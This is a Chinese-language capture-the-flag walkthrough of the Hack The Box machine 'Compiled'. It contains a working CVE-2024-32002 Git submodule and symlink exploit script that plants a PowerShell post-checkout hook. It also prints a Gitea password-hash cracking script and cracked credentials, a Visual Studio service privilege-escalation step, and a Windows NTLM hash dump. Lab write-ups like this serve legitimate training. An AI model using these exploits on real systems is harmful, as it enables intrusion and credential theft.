基本信息

端口扫描

3000,5000,5985:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
$ nmap -sC -sV -Pn 10.10.11.26
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-29 13:15 CST
Nmap scan report for 10.10.11.26
Host is up (0.088s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
3000/tcp open  http    Golang net/http server
|_http-title: Git
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=959b4523c0dee0b4; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=hY8hfcLO5RSp_U-NO3sQKMym_yc6MTcyMjIyOTc1MzY0MzMzNzQwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 29 Jul 2024 05:09:13 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-arc-green">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Git</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=f59ae1817c3fad12; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=zjgWl4iukH3vELhAWnFOYmY_lYQ6MTcyMjIyOTc1NDE2MTk5MDIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 29 Jul 2024 05:09:14 GMT
|_    Content-Length: 0
5000/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-title: Compiled - Code Compiling Services
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=7/29%Time=66A725F3%P=x86_64-apple-darwin23.4.
SF:0%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(GetRequest,3000,"HTTP/1\.0\x20200\x20OK\r\nCache-Co
SF:ntrol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_
SF:gitea=959b4523c0dee0b4;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-
SF:Cookie:\x20_csrf=hY8hfcLO5RSp_U-NO3sQKMym_yc6MTcyMjIyOTc1MzY0MzMzNzQwMA
SF:;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-
SF:Options:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2029\x20Jul\x202024\x2005:09:1
SF:3\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"
SF:theme-arc-green\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"w
SF:idth=device-width,\x20initial-scale=1\">\n\t<title>Git</title>\n\t<link
SF:\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjo
SF:iR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb2
SF:1waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpb
SF:GVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwi
SF:c2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjM
SF:wMDA")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Method\x20Not\x20
SF:Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Control:\x20max-age
SF:=0,\x20private,\x20must-revalidate,\x20no-transform\r\nSet-Cookie:\x20i
SF:_like_gitea=f59ae1817c3fad12;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r
SF:\nSet-Cookie:\x20_csrf=zjgWl4iukH3vELhAWnFOYmY_lYQ6MTcyMjIyOTc1NDE2MTk5
SF:MDIwMA;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-
SF:Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2029\x20Jul\x202024\x200
SF:5:09:14\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP
SF:/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20chars
SF:et=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.68 seconds

3000

是gitea:

5000

提交url在线编译:

Compiled

gitea那里有两个项目,一个是5000端口的web服务,另一个是计算器示例项目,其中可以得到git版本2.45.0,以及使用recursive的clone:

CVE-2024-32002

根据日常信息积累以及搜索,可以找到相关漏洞:

然后提交url,打到Richard:

1
http://gitea.compiled.htb:3000/miao/captain.git

gen.sh

来自BF论坛:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/bin/bash

git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main

rm -rf captain
rm -rf hook

git clone http://gitea.compiled.htb:3000/miao/hook.git
cd hook
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e Payload
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..

git clone http://gitea.compiled.htb:3000/miao/captain.git
cd captain
git submodule add --name x/y "http://gitea.compiled.htb:3000/miao/hook.git" A/modules/x
git commit -m "add-submodule"
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push

gitea

常规翻文件发现gitea数据库文件,查询得到hash和salt:

1
2
3
4
5
6
PS C:\Program Files\Gitea\data\gitea.db

sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0

根据得到的hash和salt,可以破解出emily的密码:

1
2
$ python3 gitea_crack.py
Found password: 12345678

gitea_crack.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import hashlib
import binascii

def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
	hash_value = hashlib.pbkdf2_hmac(
		'sha256', # hashing algorithm
		password.encode('utf-8'), # password
		salt, # salt
		iterations, # number of iterations
		dklen=dklen # key length
	)
	return hash_value
	
def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
	target_hash_bytes = binascii.unhexlify(target_hash)
	
	with open(dictionary_file, 'r', encoding='utf-8') as file:
		for line in file:
			password = line.strip()
			hash_value = pbkdf2_hash(password, salt, iterations, dklen)
			
			# Check if hash is correct
			if hash_value == target_hash_bytes:
				print(f"Found password: {password}")
				return password
				
	print("Password not found.")
	return None
	
# Parameters
salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486') # Salt from gitea.db
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16' # hash from gitea.db

# Path to dictionary
dictionary_file = 'rockyou.txt'

find_matching_password(dictionary_file, target_hash, salt)

user flag

Emily winrm登录,桌面得到user.txt:

1
evil-winrm -i 10.10.11.26 -u emily -p12345678

提权信息

常规枚举发现VSStandardCollectorService150服务,并且可以发现我们对MofCompiler.exe有权限,这个可以搜到最新漏洞:

提权 & root flag

自己根据实际情况修改代码,编译exp:

1
2
3
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";

CopyFile(L"c:\\Windows\\Tasks\\miao.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);

然后执行exploit:

1
2
3
net start msiserver
Expl.exe
.\RunasCs.exe emily 12345678 Expl.exe

hashdump

1
2
3
4
5
6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f75c95bc9312632edec46b607938061e:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Emily:1001:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Richard:1002:aad3b435b51404eeaad3b435b51404ee:f21635b4c33e9ed3ee47dd5b31ff0f92:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ac8352a8680463c78247b75a023999cc:::

参考资料